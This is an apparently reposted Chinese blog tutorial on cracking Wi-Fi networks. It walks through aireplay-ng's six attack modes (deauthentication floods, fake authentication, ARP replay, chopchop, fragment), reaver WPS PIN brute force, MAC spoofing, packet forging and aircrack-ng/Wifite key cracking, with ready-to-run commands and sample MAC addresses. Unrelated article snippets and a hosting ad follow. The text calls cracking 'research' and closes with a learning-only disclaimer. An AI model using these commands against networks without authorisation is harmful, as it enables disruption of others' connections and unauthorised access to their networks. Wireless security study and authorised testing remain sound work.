Aireplay-ng 6 种常用攻击模式详解

摘要:
AIReplay-ng-3-b<apmac>-h<mymac>wifi 0注意:使用此攻击模式的前提条件是合法的经过身份验证的客户端必须连接到路由器-1 fakeauthcount伪装客户端连接。此模式伪装客户端连接到AP。AIReplay-ng-3-b-h-x512wifi 0参数说明,建议使用512aireplay ng--areplay b50:2B:73:18:ED:81-h00:02:6F:BE:66:41lan0mon-4斩波攻击模式来获取包含关键数据的xor文件。此模式主要用于获取包含密钥数据的xor文件,该文件不能用于解密数据包。
reaver爆破WPS PIN码:
  airodump-ng wlan0
  reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv
 
macchanger更改MAC地址:
  macchanger -r wlan0
  -r:随机更换MAC
  -m:设置指定的MAC地址
Aireplay-ng 6 种常用攻击模式详解第1张
  macchanger -m 72:8e:9c:2d:a8:bb wlan0
Aireplay-ng 6 种常用攻击模式详解第2张
 
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
当目标在有客户端在进行下载、看视频等操作时Date值会剧增。
Aireplay-ng 6 种常用攻击模式详解第3张
 
Aireplay-ng 6 种常用攻击模式详解第4张
此时开启wireshark打开airodump-ng捕获的cap数据包,可以看到客户端与路由器之间的交互信息
Aireplay-ng 6 种常用攻击模式详解第5张
为了能够快速获得大量有用的数据包,可以使用deauth攻击将客户端与目标AP的连接打断再重连。
aireplay-ng --deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon
Aireplay-ng 6 种常用攻击模式详解第6张
 
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
Aireplay-ng 6 种常用攻击模式详解第7张
50:2B:73:18:ED:81 00:02:6f:be:66:41
 
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
【-a】:设置 ap 的 mac
【-c】:设置已连接的合法客户端的 mac。
如果不设置-c,则断开所有和 ap 连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
 
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和 AP 进行连接。
这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP 接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。
用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时
【-e】:设置 ap 的 essid
【-a】:设置 ap 的 mac
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
查看无线网卡MAC使用macchanger -s wlan0mon命令。
aireplay-ng --fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon
--fakeauth delay:伪装一个客户端和AP进行连接,其中delay表示连接的延迟时间。
Aireplay-ng 6 种常用攻击模式详解第8张
 
-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式
1.这种模式主要用于研究学习无客户端,先用-1 建立虚假客户端连接然后直接发包攻击 ,
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
【-2】:交互攻击模式
【-p】:设置控制帧中包含的信息(16 进制),默认采用 0841
【-c】:设置目标 mac 地址
【-b】:设置 ap 的 mac 地址
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
2.提取包,发送注入数据包 aireplay-ng -2 –r <file> -x 1024 wifi0 发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。
 
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程 这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和 ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。
如果合法客户端和ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
【-3】:arp 注入攻击模式
【-b】:设置 ap 的 mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)
aireplay-ng --arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
Aireplay-ng 6 种常用攻击模式详解第9张
 
-4 Chopchop 攻击模式
用以获得一个包含密钥数据的 xor 文件 这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 参数说明:
【-b】:设置需要研究学习的 AP 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
aireplay-ng --chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
 
 
  然后使用Packetforge-ng(网络数据包伪造工具)伪造数据包,packetforge-ng使用方法如下:
  packetforge-ng <mode> <options>
  packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet
  -0,--arp:伪造一个arp的数据包
  -l <ip[:port]> : 设置源IP地址和端口
  -k <ip[:port]> : 设置目标IP地址和端口
  -y <file> : 从指定文件读取PRGA(wep加密中间量)
 
  aireplay-ng -2 -r chopchop-packet wlan0mon
  -2,--interactive : 交互式帧选择
  -r <file> : 从pcap文件中提取数据包
 
  aircrack-ng chopchop-01.cap
 
-5 fragment 碎片包攻击模式
用以获得 PRGA(包含密钥的后缀为 xor 的文件) 这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key 数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻击模式
【-b】:设置 ap 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
Packetforge-ng:数据包制造程序 Packetforge-ng <mode> <options>Mode
【-0】:伪造 ARP 包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp
参数说明:
【-0】:伪装 arp 数据包
【-a】:设置 ap 的 mac
【-h】设置虚拟伪装连接的 mac(即自己的 mac)
【-k】<ip[:port]>说明:设置目标文件 IP 和端口
【-l】<ip[:port]>说明:设置源文件 IP 和端口
【-y】<file>说明:从 xor 文件中读取 PRGA。后面跟 xor 的文件名。
【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究学习主程序
Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs )
参数说明:
【-n】:设置 WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力研究学习模式
【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2 aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。
aireplay-ng --fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon
 
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet
 
aireplay-ng -2 -r fragment-packet wlan0mon
 
aircrack-ng fragment-01.cap
 
WiFite破解WEP/WPA/WPA2
  Wifite是一款自动化wifi密码破解工具,特点是支持多个wep,wpa加密的wifi网络,而且过程自动配置,无需人员干预!而且WiFi支持调用hcxdumptool、hcxtools和hashcat进行PMKID攻击。
  PMKID攻击是一种无需四次握手包即可破解WPA&WPA2密码的攻击方式,使用PMKID破解WPA预共享密钥的方法,与现有的其它破解方法不同,该方法不再需要抓取完整的EAPOL四次握手包,只需要一个EAPOL帧中的RSN IE(Robust Security Network Information Element)即可,具体可以参考
https://www.freebuf.com/articles/wireless/179953.html
Aireplay-ng 6 种常用攻击模式详解第10张

免责声明:文章转载自《Aireplay-ng 6 种常用攻击模式详解》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇C++使用new和不使用new创建对象区别windows内核原理及实现-----进程线程管理------3.3节中 windows中进程线程的数据结构下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

在Docker中运行EOS(MAC版)

在Docker中运行EOS(MAC版) 在Docker中也可以简单快速的构建EOS.IO.笔者在Mac平台下参考官方文档躺了一次河。记录如下: 安装依赖 Docker 版本 17.05或者更高 testdeMBP:Docker test$ docker -vDocker version 18.04.0-ce, build 3d479c0 docke...

Mac 10.7 使用Maven 小记

前前后后搞了3天,先是装插件,我发现最近,新下的eclipse3.7在market里装m2e插件总是报missing slf4j.jar的错误,于是我google了找了个m2e离线包,以link的方式安装。接着,各种奇葩的问题便出现了。 首先在Mac10.7下(mac10.7)导入公司的maven项目后发现总是missing artifact,但我明明把缺...

Mac终端命令远程开启屏幕共享进行远程控制

Mac终端命令远程开启屏幕共享进行远程控制   版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/showhilllee/article/details/49306211 使用背景 我们有几台Mac作为服务器,开启了ssh,之前上线之类的操作都是通过命令来进行的。之前也没觉得什么,但是上次上线忽然...

macos下安装单机版hadoop

mac单机 brew install hadoop Configure 默认配置目录为/usr/local/cellar/hadoop/3.3.0/libexec/etc/hadoop/ hadoop-env.sh # 放开并设置 export JAVA_HOME="/Library/Java/JavaVirtualMachines/adoptopenj...

IDEA 快捷键(MAC 版)说明

转载自:http://blog.csdn.net/sky19891212/article/details/42842871 希望这个版本的介绍更加清楚,减少你一些困惑。 KeyMap文件位置: 在OS X系统中,快捷键配置文件存在于: ~/Library/Preferences/.IntelliJ IDEA <xx>/keymaps/ 你可以在...

mac下如何制作windows启动盘

首先我们需要准备: 1、8G 以及以上的U盘,因为windows10镜像文件大小为5G多点。 2、微软官方的ISO镜像 3、一台macOS系统的主机。 制作流程: 1、格式化 U 盘,并命名为 WINDOWS10; 2、挂载 Windows 安装盘 iso 镜像文件; 3、打开mac自带的终端; 4、拷贝 iso 内部文件至 U 盘; 具体方法: 一、wi...